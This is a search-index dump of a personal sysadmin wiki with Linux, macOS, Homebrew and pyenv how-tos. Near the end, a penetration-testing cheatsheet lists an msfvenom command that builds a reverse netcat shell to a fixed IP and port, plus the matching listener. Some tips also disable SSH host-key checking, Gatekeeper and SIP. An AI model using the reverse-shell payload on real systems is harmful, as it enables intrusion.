", "tags": ["linux", "network"]}, {"location": "linux/Network/identify-nics/#the-solution", "title": "The Solution", "text": "ethtool
tool can be used to identify the physical network interface corresponding to a network interface name.
For this method to work, you need a physical access
to host's network cards and the physical network interfaces should have Led indicator
lights.
Note
This functionality of ethtool may not be supported by all server or network card hardware.
ethtool
usually isn't installed by default on a linux host. You can install it by running the following command (debian example):
apt install ethtool\n
Find the network interfaces present on the host and run the following command for each network interface:
ip addr\n
or
ifconfig -a\n
Now you can use the ethtool
command to identify the physical network interface corresponding to the network interface name.
Example for eth0
network interface name:
ethtool --identify eth0\n
This command will run untill you stop it. When it's running, you should see the LED indicator light blinking
(usually orange) on the physical network interface corresponding to the network interface name.
To get information about the hardware capabilities of the network interface:
ethtool eth0\n
output example:
ethtool enp12s0f4\n\nSettings for enp12s0f4:\n Supported ports: [ FIBRE ]\nSupported link modes: 1000baseT/Full\n 10000baseT/Full\n Supported pause frame use: Symmetric Receive-only\n Supports auto-negotiation: No\n Supported FEC modes: None\n Advertised link modes: 10000baseT/Full\n Advertised pause frame use: Symmetric\n Advertised auto-negotiation: No\n Advertised FEC modes: None\n Link partner advertised link modes: Not reported\n Link partner advertised pause frame use: Symmetric\n Link partner advertised auto-negotiation: No\n Link partner advertised FEC modes: None\n Speed: 10000Mb/s\n Duplex: Full\n Auto-negotiation: off\n Port: Direct Attach Copper\n PHYAD: 255\nTransceiver: internal\n Current message level: 0x000000ff (255)\ndrv probe link timer ifdown ifup rx_err tx_err\n Link detected: yes\n
", "tags": ["linux", "network"]}, {"location": "linux/ubuntu-debian/disable-ipv6/", "title": "Disable IPv6 on Ubuntu and Debian Linux Permanently", "text": "By default, Ubuntu/Debian IPv6 is enabled after installation. This means that the IPv6 stack is active and the host can communicate with other hosts on the same network via IPv6 protocol.
You can disable Ubuntu/Debian by editing the /etc/default/grub
file.
nano /etc/default/grub\n
add ipv6.disable=1
to the end of GRUB_CMDLINE_LINUX_DEFAULT
and GRUB_CMDLINE_LINUX
line. Don't change the other values at those lines.
GRUB_CMDLINE_LINUX_DEFAULT=\"ipv6.disable=1\"\nGRUB_CMDLINE_LINUX=\"ipv6.disable=1\"\n
The config should look like this:
Update the grub configuration.
update-grub\n
Save and exit. Reboot
to apply the changes.
", "tags": ["ubuntu", "debian", "ipv6"]}, {"location": "linux/ubuntu-debian/free-port-53/", "title": "Free Port 53 on Ubuntu", "text": "", "tags": ["Ubuntu", "dns"]}, {"location": "linux/ubuntu-debian/free-port-53/#whats-using-port-53", "title": "What's Using Port 53?", "text": "When you install Ubuntu (in my case its Server version). It uses systemd-resolved as internal DNS Forwarder.
systemd-resolved is a system service that provides network name resolution to local applications. It implements a caching and validating DNS/DNSSEC stub resolver, as well as an LLMNR resolver and responder.
", "tags": ["Ubuntu", "dns"]}, {"location": "linux/ubuntu-debian/free-port-53/#how-to-free-port-53-on-ubuntu", "title": "How to Free Port 53 on Ubuntu", "text": "If we want to use port 53 for other purposes, we need to free it for example a Pihole DNS
server.
We can do it with the following commands:
sudo sed -r -i.orig 's/#?DNSStubListener=yes/DNSStubListener=no/g' /etc/systemd/resolved.conf\nsudo sh -c 'rm /etc/resolv.conf && ln -s /run/systemd/resolve/resolv.conf /etc/resolv.conf'\nsudo systemctl restart systemd-resolved\n
", "tags": ["Ubuntu", "dns"]}, {"location": "linux/ubuntu-debian/remove-snap-store/", "title": "Remove Snap Store from Ubuntu", "text": "", "tags": ["ubuntu"]}, {"location": "linux/ubuntu-debian/remove-snap-store/#what-is-snap", "title": "What Is Snap?", "text": "Snap is a cross-platform packaging and deployment system developed by Canonical, the makers of Ubuntu, for the Linux platform. It's compatible with most major Linux distros, including Ubuntu, Debian, Arch Linux, Fedora, CentOS, and Manjaro.
", "tags": ["ubuntu"]}, {"location": "linux/ubuntu-debian/remove-snap-store/#how-to-remove-snap-store", "title": "How To Remove Snap Store", "text": "sudo rm -rf /var/cache/snapd/\nsudo apt autoremove --purge snapd gnome-software-plugin-snap\nsudo rm -rf ~/snap\n
", "tags": ["ubuntu"]}, {"location": "linux/ubuntu-debian/unattended-upgrades/", "title": "Unattended Upgrades", "text": "sudo apt install -y unattended-upgrades apt-listchanges\n
Edit the config to your preference
sudo nano /etc/apt/apt.conf.d/50unattended-upgrades\n
Example
UbuntuDebian/RaspberyOS Unattended-Upgrade::Allowed-Origins {\n\"${distro_id}:${distro_codename}\";\n\"${distro_id}:${distro_codename}-security\";\n// Extended Security Maintenance; doesn't necessarily exist for\n// every release and this system may not have it installed, but if\n// available, the policy for updates is such that unattended-upgrades\n// should also install from here by default.\n\"${distro_id}ESMApps:${distro_codename}-apps-security\";\n\"${distro_id}ESM:${distro_codename}-infra-security\";\n\"${distro_id}:${distro_codename}-updates\";\n\"${distro_id}:${distro_codename}-proposed\";\n// \"${distro_id}:${distro_codename}-backports\";\n};\n\nUnattended-Upgrade::DevRelease \"auto\";\nUnattended-Upgrade::AutoFixInterruptedDpkg \"true\";\nUnattended-Upgrade::MinimalSteps \"true\";\nUnattended-Upgrade::InstallOnShutdown \"false\";\n//Unattended-Upgrade::Mail \"\";\n//Unattended-Upgrade::MailReport \"on-change\";\nUnattended-Upgrade::Remove-Unused-Kernel-Packages \"true\";\nUnattended-Upgrade::Remove-New-Unused-Dependencies \"true\";\nUnattended-Upgrade::Remove-Unused-Dependencies \"true\";\nUnattended-Upgrade::Automatic-Reboot \"true\";\nUnattended-Upgrade::Automatic-Reboot-WithUsers \"true\";\nUnattended-Upgrade::Automatic-Reboot-Time \"06:00\";\n//Acquire::http::Dl-Limit \"70\";\n// Unattended-Upgrade::SyslogEnable \"false\";\n// Unattended-Upgrade::SyslogFacility \"daemon\";\n// Unattended-Upgrade::OnlyOnACPower \"true\";\n// Unattended-Upgrade::Skip-Updates-On-Metered-Connections \"true\";\n// Unattended-Upgrade::Verbose \"false\";\n// Unattended-Upgrade::Debug \"false\";\n// Unattended-Upgrade::Allow-downgrade \"false\";\n
Unattended-Upgrade::Origins-Pattern {\n// Codename based matching:\n// This will follow the migration of a release through different\n// archives (e.g. from testing to stable and later oldstable).\n// Software will be the latest available for the named release,\n// but the Debian release itself will not be automatically upgraded.\n\"origin=Debian,codename=${distro_codename}-updates\";\n// \"origin=Debian,codename=${distro_codename}-proposed-updates\";\n\"origin=Debian,codename=${distro_codename},label=Debian\";\n\"origin=Debian,codename=${distro_codename},label=Debian-Security\";\n\n// Archive or Suite based matching:\n// Note that this will silently match a different release after\n// migration to the specified archive (e.g. testing becomes the\n// new stable).\n// \"o=Debian,a=stable\";\n// \"o=Debian,a=stable-updates\";\n// \"o=Debian,a=proposed-updates\";\n// \"o=Debian Backports,a=${distro_codename}-backports,l=Debian Backports\";\n};\n\nUnattended-Upgrade::DevRelease \"auto\";\nUnattended-Upgrade::AutoFixInterruptedDpkg \"true\";\nUnattended-Upgrade::MinimalSteps \"true\";\nUnattended-Upgrade::InstallOnShutdown \"false\";\n//Unattended-Upgrade::Mail \"\";\n//Unattended-Upgrade::MailReport \"on-change\";\nUnattended-Upgrade::Remove-Unused-Kernel-Packages \"true\";\nUnattended-Upgrade::Remove-New-Unused-Dependencies \"true\";\nUnattended-Upgrade::Remove-Unused-Dependencies \"true\";\nUnattended-Upgrade::Automatic-Reboot \"true\";\nUnattended-Upgrade::Automatic-Reboot-WithUsers \"true\";\nUnattended-Upgrade::Automatic-Reboot-Time \"06:00\";\n// Acquire::http::Dl-Limit \"70\";\n// Unattended-Upgrade::SyslogEnable \"false\";\n// Unattended-Upgrade::SyslogFacility \"daemon\";\n// Unattended-Upgrade::OnlyOnACPower \"true\";\n// Unattended-Upgrade::Skip-Updates-On-Metered-Connections \"true\";\n// Unattended-Upgrade::Verbose \"false\";\n// Unattended-Upgrade::Debug \"false\";\n// Unattended-Upgrade::Allow-downgrade \"false\";\n
Automatic call via /etc/apt/apt.conf.d/20auto-upgrades
echo unattended-upgrades unattended-upgrades/enable_auto_updates boolean true | sudo debconf-set-selections\nsudo dpkg-reconfigure -f noninteractive unattended-upgrades\n
Check the /etc/apt/apt.conf.d/20auto-upgrades for those 2 lines:
APT::Periodic::Update-Package-Lists \"1\";\nAPT::Periodic::Unattended-Upgrade \"1\";\n
Manual Run:
sudo unattended-upgrade -d\n
To enable unattended-upgrade use the following command:
sudo dpkg-reconfigure --priority=low unattended-upgrades\n
", "tags": ["ubuntu"]}, {"location": "mac-os/applications-tweaks/", "title": "Applications Tweaks", "text": "", "tags": ["macOS"]}, {"location": "mac-os/applications-tweaks/#running-multi-instances-of-an-application", "title": "Running Multi Instances of an Application", "text": "Launch the Script Editor choose temporary folder
Copy the command to be executed to the Script Editor
do shell script \"open -n <path to application>\"\n
Example
do shell script \"open -n /Applications/'Visual Studio Code.app'\"
File > Export
Use the following settings:
Export As: Your New Application Name Where: Applications File Format: Application Change The Icon of Your New Application:
In Finder got to Applications folder. Right Click on the new Your New Application application we just created and click Get Info. Drug the original application icon (or any other) to the in the left corner of the \"get info\" menu.
", "tags": ["macOS"]}, {"location": "mac-os/applications-tweaks/#lunch-firefox-profile-manager-as-application", "title": "Lunch Firefox Profile Manager as Application", "text": "Launch the Script Editor choose temporary folder
Copy the command to be executed to the Script Editor
do shell script \"/Applications/Firefox.app/Contents/MacOS/firefox -ProfileManager &> /dev/null &\"\n
File > Export
Use the following settings:
Save As: Firefox Profile Manager Where: Applications File Format: Application Change The Icon of Your New Firefox Profile Manager Application:
In Finder got to Applications folder. Right Click on the new Firefox Profile Manager application we just created and click Get Info. Drug the original application to the icon in the left corner of the \"get info\" menu.
", "tags": ["macOS"]}, {"location": "mac-os/enable-root-user/", "title": "Enable or Disable the Root User on macOS", "text": "Mac administrators can use the root user account to perform tasks that require access to more areas of the system.
The user account named \u201droot\u201d is a superuser with read and write privileges to more areas of the system, including files in other macOS user accounts. The root user is disabled by default. If you can log in to your Mac with an administrator account, you can enable the root user, then log in as the root user to complete your task.
", "tags": ["macOS"]}, {"location": "mac-os/enable-root-user/#how-to-enable-the-root-user", "title": "How to Enable the Root User", "text": "System Preferences
> Users & Groups
Click lock
icon, enter an administrator name and password. Click Login Options
. Click Join
at Newotk Account Server
.
Click Open Directory Utility
.
Click lock icon in the Directory Utility window, then enter an administrator name and password.
From the menu bar in Directory Utility: Choose Edit > Enable Root User, then enter the password that you want to use for the root user. Or choose Edit > Disable Root User.
", "tags": ["macOS"]}, {"location": "mac-os/enable-root-user/#how-to-disable-the-root-user", "title": "How to Disable the Root User", "text": "To Disable the Root User repeat the steps above, but change the last step to Disable Root User.
", "tags": ["macOS"]}, {"location": "mac-os/enable-root-user/#login-as-the-root-user", "title": "Login as The Root User", "text": "When the root user is enabled, you have the privileges of the root user only while logged in as the root user.
Logout of your current account, then log in as the root user. user name \u201droot\u201d and the password you created for the root user.
", "tags": ["macOS"]}, {"location": "mac-os/import-ssh-keys-keychain/", "title": "Import ed25519/RSA Keys Passphrase to macOS Keychain", "text": "First, you need to add the keys to the keychain
with the following steps:
Copy your ed25519, ed25519.pub
/ id_rsa, id_rsa.pub
to ~/.ssh/
folder
Store the key in the MacOS Keychain
ed25519 KeyRSA Key ssh-add --apple-use-keychain ~/.ssh/ed25519\n
ssh-add --apple-use-keychain ~/.ssh/id_rsa\n
Enter your key passphrase. You won't be asked for it again.
List all keys in the keychain:
ssh-add -l\n
", "tags": ["macos"]}, {"location": "mac-os/import-ssh-keys-keychain/#configure-ssh-to-always-use-the-keychain", "title": "Configure SSH to always use the keychain", "text": "If you haven't already, create an ~/.ssh/config
file. In other words, in the .ssh directory in your home dir, make a file called config.
At ~/.ssh/config
file, add the following lines at the top of the config:
Store the key in the MacOS Keychain
For ed25519 KeyFor RSA Key Host *\n UseKeychain yes\n AddKeysToAgent yes\n IdentityFile ~/.ssh/id_ed25519\n
Host *\n UseKeychain yes\n AddKeysToAgent yes\n IdentityFile ~/.ssh/id_rsa\n
The UseKeychain yes is the key part, which tells SSH to look in your macOS keychain for the key passphrase.
That's it! Next time you load any ssh connection, it will try the private keys you've specified, and it will look for their passphrase in the macOS keychain. No passphrase typing required.
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/", "title": "Terminal Snippets", "text": "Terminal usage snippets for macOS. This is a collection of snippets that I use without specific category.
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#install-macos-updates-via-cli", "title": "Install macOS Updates via CLI", "text": "softwareupdate -i -a\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#install-command-line-tools", "title": "Install Command Line Tools", "text": "xcode-select --install\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#shell-safe-rm", "title": "Shell Safe rm", "text": "Source shell-safe-rm github
A much safer replacement of shell rm
with ALMOST FULL features of the origin rm
command.
Initially developed on Mac OS X, then tested on Linux.
Using safe-rm
, the files or directories you choose to remove will move to $HOME/.Trash
instead of simply deleting them. You could put them back whenever you want manually.
If a file or directory with the same name already exists in the Trash, the name of newly-deleted items will be ended with the current date and time.
Install with npm:
npm i -g safe-rm\n
Add Alias to your zshrc config
alias rm='safe-rm'\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#disable-stricthostkeychecking-in-ssh", "title": "Disable StrictHostKeyChecking in SSH", "text": "To disable strict host checking on OS X for the current user, create or edit ~/.ssh/ssh_config
and add the following lines:
StrictHostKeyChecking no\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#set-macos-hostname-via-cli", "title": "Set macOS Hostname via CLI", "text": "sudo scutil --set HostName <NewHostNameHere>\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#syntax-highlighting-for-nano", "title": "Syntax Highlighting for Nano", "text": "Install Nano from homebrew Create ~/.nanorc
file with the syntax below
brew install nano\ntouch ~/.nanorc\n
Edit ~/.nanorc
file with the syntax below
M1 (ARM)Intel Based echo 'include \"/opt/homebrew/share/nano/*.nanorc\"' >> ~/.nanorc\n
echo 'include \"/usr/local/share/nano/*.nanorc\"' >> ~/.nanorc\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#disableenable-gatekeeper", "title": "Disable/Enable Gatekeeper", "text": "Disable Gatekeeper
sudo spctl --master-disable\n
Enable Gatekeeper
sudo spctl --master-enable\n
Check Status
spctl --status\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#disableenable-sip-system-integrity-protection", "title": "Disable/Enable SIP (System Integrity Protection)", "text": "Reboot your Mac into Recovery Mode by restarting your computer and holding down Command+R until the Apple logo appears on your screen. Click Utilities > Terminal. In the Terminal window, type in:
Status:
csrutil status\n
Disable:
csrutil disable\n
Enable:
csrutil enable\n
Press Enter and restart your Mac.
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#installing-rbenv-ruby-send-box-ruby-alternative-to-the-one-that-macos-uses", "title": "Installing rbenv (ruby send box) - Ruby alternative to the one that macOS uses", "text": "Install rbenv with brew
brew install rbenv\n
Add eval \"$(rbenv init -)\"
to the end of ~/.zshrc
or ~/.bash_profile
Install a ruby version
rbenv install 2.3.1\n
Select a ruby version by rbenv
rbenv global 2.3.1\n
Open a new terminal window
Verify that the right gem folder is being used with gem env home
(should report something in your user folder not system wide)
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#list-listening-ports-and-programs-and-users-netstat-like", "title": "List listening Ports and Programs and Users (netstat like)", "text": "sudo lsof -i -P | grep -i \"listen\"\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#disable-last-login-at-terminal", "title": "Disable \"last login\" at Terminal", "text": "cd ~/\ntouch .hushlogin\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#fix-missing-usersshared-folder", "title": "Fix Missing /Users/Shared Folder", "text": "Create he missing /Users/Shared folder
sudo mkdir -p /Users/Shared/\n
Fix permissions for the /Users/Shared folder
sudo chmod -R 1777 /Users/Shared\n
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#iterm2", "title": "iTerm2", "text": "Using Alt/Cmd + Right/Left Arrow in iTerm2
Go to iTerm Preferences
\u2192 Profiles
, select your profile, then the Keys
tab. click Load Preset
... and choose Natural Text Editing
.
Remove the Right Arrow Before the Cursor Line
you can turn it off by going in to Preferences
> Profiles
> (your profile) > Terminal
, scroll down to Shell Integration
, and turn off Show mark indicators
.
", "tags": ["macos"]}, {"location": "mac-os/terminal-snippets/#clear-google-drive-cache", "title": "Clear Google Drive cache", "text": "rm -rf ~/Library/Application\\ Support/Google/DriveFS/[0-9]*\n
", "tags": ["macos"]}, {"location": "mac-os/touch-id-for-sudo/", "title": "TouchID for sudo", "text": "Apple devices such Macbooks and some Apple Magic Keyboards have a fingerprint - Touch ID scanner that can be used to authenticate a user with a touch of a finger. This functionality isn't available when using sudo
to run commands. You have to enter your password every time you run commands with high privileges.
We can enable TouchID for sudo with a simple config change. This will allow you to use Touch ID to authenticate with sudo
without entering your password including the authentication with Apple Watch.
Display Link - Known Issue
As of the writing of this article, the Display Link Driver will privent the use of Touch ID for sudo when using the Display link device. It will work when the Display Link device isn't connected. This is a known issue.
", "tags": ["macOS", "iTerm2", "terminal", "touchID"]}, {"location": "mac-os/touch-id-for-sudo/#enable-touchid-for-sudo", "title": "Enable TouchID for sudo", "text": "Open in text editor file with sudo privileges /etc/pam.d/sudo
. In the next example we will use the nano
editor.
sudo nano /etc/pam.d/sudo\n
Add at the top of the config file this line:
auth sufficient pam_tid.so\n
Your config should look like this:
Save and Exit.
You can test your TouchID prompt in terminal by opening new session and running:
sudo -l\n
", "tags": ["macOS", "iTerm2", "terminal", "touchID"]}, {"location": "mac-os/touch-id-for-sudo/#enable-touchid-support-in-iterm2", "title": "Enable TouchID Support in iTerm2", "text": "In order to enable TouchID support in iTerm2, you need to complete the above section and then follow the steps below:
Go to iTerm2
-> Preferences
-> Advanced
and search for:
Allow session to survive\n
Change Allow session to survive logging out and back in. to No
You can test your TouchID prompt in iTerm2 by opening new session and running:
sudo -l\n
", "tags": ["macOS", "iTerm2", "terminal", "touchID"]}, {"location": "mac-os/ui-tweaks/", "title": "UI Tweaks", "text": "", "tags": ["macOS"]}, {"location": "mac-os/ui-tweaks/#hide-all-the-icons-on-your-desktop", "title": "Hide All The Icons On Your Desktop", "text": "Disable Icons:
defaults write com.apple.finder CreateDesktop false\nkillall Finder\n
Enable Icons:
defaults write com.apple.finder CreateDesktop true\nkillall Finder\n
", "tags": ["macOS"]}, {"location": "mac-os/ui-tweaks/#change-the-launchpad-grid-layout", "title": "Change the Launchpad Grid Layout", "text": "Change the springboard-columns and springboard-rows values according to your preference
defaults write com.apple.dock springboard-columns -int 8\ndefaults write com.apple.dock springboard-rows -int 6\ndefaults write com.apple.dock ResetLaunchPad -bool TRUE\nkillall Dock\n
", "tags": ["macOS"]}, {"location": "mac-os/ui-tweaks/#reset-launchpad-icons-sort", "title": "Reset Launchpad Icons Sort", "text": "defaults write com.apple.dock ResetLaunchPad -bool true; killall Dock\n
", "tags": ["macOS"]}, {"location": "mac-os/ui-tweaks/#set-the-same-view-options-for-all-finder-windows", "title": "Set the Same View Options
for all Finder windows", "text": "First, we want to set the default view options for all new Finder windows. To do so, open Finder and click on the view setting that you want to use. The settings are four icons and the top of your Finder window. If you don't see the Finder toolbar type:
cmd + option + t\n
After selecting the option you want, type:
cmd + j\n
to open the view options window.
Make sure you check the top two checkboxes that say Always open in list view and Browse in list view. Keep in mind it will reflect whichever view you've selected.
Now click the button at the bottom that says \"Use as Defaults\".
", "tags": ["macOS"]}, {"location": "mac-os/ui-tweaks/#delete-all-ds_store-files-on-your-computer", "title": "Delete all .DS_Store files on your computer", "text": "Chances are you've opened some Finder windows in the past. Individual folder options will override this default setting that we just set.
In order reset your folder settings across the entire machine we have to delete all .DS_Store files. This will ensure that all folders start fresh. Open up the Terminal application (Applications/Utilities/Terminal), and type:
sudo find / -name .DS_Store -delete 2>/dev/null ; killall Finder\n
Note: In the future, whenever you switch views, it will automatically save in the new .DS_Store file. This will override the default settings.
", "tags": ["macOS"]}, {"location": "mac-os/homebrew/brewup/", "title": "BrewUp", "text": "", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#description", "title": "Description", "text": "Brewup script is a Bash script that uses Homebrew - The Missing Package Manager for macOS as it's base. Brewup uses GitHub as a \"backup\" of a config file which contains all installed Taps, Formulas, Casks and App Store Apps at your macOS. It also allows the use of Github main function of retaining changes so you can always look up for the package that were installed sometime ago and you just forgot what is was exactly.
Visit as at 3os.org for more guides and tips for macOS
", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#what-brewup-actually-does", "title": "What Brewup Actually Does", "text": "It just runs few Brew functionality automatically:
brew doctor brew missing brew upgrade brew cask upgrade brew cleanup App Store Updates Creating Updated Brewfile Pushing changes to Git ", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#requirements", "title": "Requirements", "text": " Homebrew The missing package manager for macOS git (with active account) Mas, terminal-notifier, coreutils (will be installed if missing at the first script execution) ", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#installing", "title": "Installing", "text": "Use this repository as template, it will create a Fork
for you and you can start using it.
git clone <paste the your repo url here>\n
sudo ln -s ${PWD}/BrewUp/brewup.sh /usr/local/bin/brewup\n
Note: if /usr/local/bin/
is missing create it with
sudo mkdir /usr/local/bin/\n
", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#usage", "title": "Usage", "text": "just run from terminal:
brewup\n
Install all apps from BrewFile:
cd to local location you cloned your repository and run:
brew bundle install --file=<BrewFile Name>\n
", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#license", "title": "License", "text": "", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/brewup/#mit-license", "title": "MIT License", "text": "Copyright \u00a9 Stas Kosatuhin @2019
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
", "tags": ["macos", "homebrew", "bash", "github"]}, {"location": "mac-os/homebrew/homebrew-snippets/", "title": "Brew Snippets", "text": "", "tags": ["macOS", "homebrew"]}, {"location": "mac-os/homebrew/homebrew-snippets/#brew-pinns-freez-and-unfreez-specific-packages", "title": "Brew Pinns - Freez and Unfreez Specific Packages", "text": "This will alow you to pin (freez update) to specific packages to your Homebrew installation and then unfreeze them.
List of packages that you freeze
brew list --pinned\n
Freeze Version
brew pin <formula>\n
Unfreeze Version
brew unpin <formula>\n
", "tags": ["macOS", "homebrew"]}, {"location": "mac-os/homebrew/homebrew-snippets/#uninstall-brew-package-and-dependencies", "title": "Uninstall Brew Package and Dependencies", "text": "Remove package's dependencies (does not remove package):
brew deps [FORMULA] | xargs brew remove --ignore-dependencies\n
Remove package:
brew remove [FORMULA]\n
Reinstall missing libraries:
brew missing | cut -d: -f2 | sort | uniq | xargs brew install\n
", "tags": ["macOS", "homebrew"]}, {"location": "mac-os/python/pyenv-virtualenv/", "title": "Pyenv-virtualenv - Multiple Version Python Virtual Environment Manager", "text": "For easy non-multiple version Python Virtual Environment follow this Venv Python Virtual Environment
", "tags": ["maco", "python"]}, {"location": "mac-os/python/pyenv-virtualenv/#intro", "title": "Intro", "text": "Using and developing with Python on macOS sometimes may be frustrating...
The reason for that is that macOS uses Python 2 for its core system with pip as a package manager. When Xcode Command Line Tools are installed Python 3 and pip3 package manager will be available at the cli. When using Python2, Python3 and their package managers this way, all the packages will be installed at the system level and my effect the native packages and their dependences , this can break or lead to unwanted bugs in OS.
The right way to use python at macOS is to use Virtual Environments for python. This way all the system related versions of python and their packages won't be affected and use by you.
", "tags": ["maco", "python"]}, {"location": "mac-os/python/pyenv-virtualenv/#installing-and-configuring-pyenv-pyenv-virtualenv", "title": "Installing and configuring pyenv, pyenv-virtualenv", "text": "In order to use pyenv, pyenv-virtualenv without conflicting with the native macOS python we need to add some configuration to our ~/.zshrc config (for mac os catalina) or your bash config if you are still using bash.
It's very imported to maintain the order of the configuration for the loading order
First of all we need to include your Executable Paths. In the example we added all the common paths, including the paths for pyenv, pyenv-virtualenv. If you have any other path that you use, you can add them at the same line or create a new line below this one. Second to Executable Paths we will add two if statements that will check if the pyenv,pyenv-virtualenv are installed, if they are it will load them. If they aren't and you are using the same zsh or bash config it will ignore loading them Third is a fix for brew, brew doctor. When using this method it may conflict with brew as it uses python as well. If you run run brew doctor without the fix, it will show config warnings related to the python configuration files. Configuration for ~/.zshrc or ~/.zprofile
# Executable Paths\n## Global\nexport PATH=\"/usr/local/bin:/usr/local/sbin:/Users/${USER}/.local/bin:/usr/bin:/usr/sbin:/bin:/sbin:$PATH\"\n\n## Curl\nexport PATH=\"/opt/homebrew/opt/curl/bin:$PATH\"\nexport LDFLAGS=\"-L/opt/homebrew/opt/curl/lib\"\nexport CPPFLAGS=\"-I/opt/homebrew/opt/curl/include\"\nexport PKG_CONFIG_PATH=\"/opt/homebrew/opt/curl/lib/pkgconfig\"\n\n# pyenv, pyenv-virtualenv\n## Initiating pyenv and fix Brew Doctor: \"Warning: \"config\" scripts exist outside your system or Homebrew directories\"\nif which pyenv >/dev/null; then\n eval \"$(pyenv init --path)\"\n alias brew='env PATH=${PATH//$(pyenv root)\\/shims:/} brew'\nfi\n\n## Initiating pyenv-virtualenv\nif which pyenv-virtualenv-init >/dev/null; then\n eval \"$(pyenv virtualenv-init -)\"\nfi\n
After you saved your configuration the best way to load it is to close your terminal session and open it again. This will load the session with your updated configuration. There should be no errors at the new session.
This will install both pyenv and pyenv-virtualenv
brew install pyenv-virtualenv\n
Test if pyenv loaded currently
pyenv -v\n
After the installation we would like to set a system level python version, you can chose the default from the list available from the pyenv
List available Python Version and find the version suited for your needs:
pyenv install --list\n
Install Requeued Python Version (Exmaple version 3.9.5) as a default system
pyenv install 3.9.5\n
Set it as global
pyenv global 3.9.5\n
You can install multiply versions of python at the same time.
List all installed python versions and virtual environments and their python versions
pyenv versions\n
Now let's test our system Python version we set before, it should be the version you choose as Global before
python -V\n
So far we cleaned your system and installed and configured pyenv, pyenv-virtualenv.
", "tags": ["maco", "python"]}, {"location": "mac-os/python/pyenv-virtualenv/#how-to-use-pyenv-virtualenv", "title": "How to use pyenv-virtualenv", "text": "Now let's understand how to use Python Virtual Environment with pyenv-virtualenv
Full documentation can be found at the original repo at git hub: pyenv-virtualenv github
We will list here some basic examples for a quick start and basic understanding
To create a virtualenv for the Python version used with pyenv, run pyenv virtualenv, specifying the Python version you want and the name of the virtualenv directory. For example,
pyenv virtualenv 3.9.5 my-project-name\n
This will create a virtualenv based on Python 3.9.5 under $(pyenv root)/versions in a folder called my-project-name
Activating virtualenv automatically for project
The best way we found to activate the virtualenv at your project is to link the projects directory to the virtualenv.
cd to the project's directory and link the virtualenv for example my-project-name virtualenv
pyenv local my-project-name\n
This will activate the linked virtualenv every time you cd to this directory automatically From now you can use pip to install any packages you need for your project, the location of the installed packages will be at $(pyenv root)/versions/
Activating virtualenv manually for project
You can also activate and deactivate a pyenv virtualenv manually:
pyenv activate <virtualenv name>\npyenv deactivate\n
This will alow you to use multiply versions of python or packages for the same project
List existing virtualenvs
pyenv virtualenvs\n
Delete existing virtualenv
pyenv uninstall my-virtual-env\n
or
pyenv virtualenv-delete my-virtual-env\n
You and your macOS should be ready for using python the right way without conflicting any system or Xcode Command Line Tools (used by brew)
", "tags": ["maco", "python"]}, {"location": "penetration-testing/cheatsheets/cli-commands-collation/", "title": "Cli Commands Collation", "text": "", "tags": ["pt", "penetration-testing", "cli", "commands", "collation"]}, {"location": "penetration-testing/cheatsheets/cli-commands-collation/#find-ptr-owner-reversal-look-up", "title": "Find PTR Owner - Reversal Look Up", "text": "dig 0.168.192.in-addr.arpa. NS\n
", "tags": ["pt", "penetration-testing", "cli", "commands", "collation"]}, {"location": "penetration-testing/cheatsheets/cli-commands-collation/#listent-for-pingicmp-on-interface", "title": "Listent for Ping/icmp on interface", "text": "sudo tcpdump ip proto \\\\icmp -i eth0\n
", "tags": ["pt", "penetration-testing", "cli", "commands", "collation"]}, {"location": "penetration-testing/cheatsheets/cli-commands-collation/#reverse-netcat-shell", "title": "Reverse Netcat Shell", "text": "Payload R(row)
msfvenom -p cmd/unix/reverse_netcat lhost=10.11.19.49 lport=4444 R\n
listener:
nc -lvp 4444\n
", "tags": ["pt", "penetration-testing", "cli", "commands", "collation"]}, {"location": "penetration-testing/cheatsheets/cli-commands-collation/#nfs-show-mount", "title": "NFS Show Mount", "text": "showmount -e 10.10.87.232\n
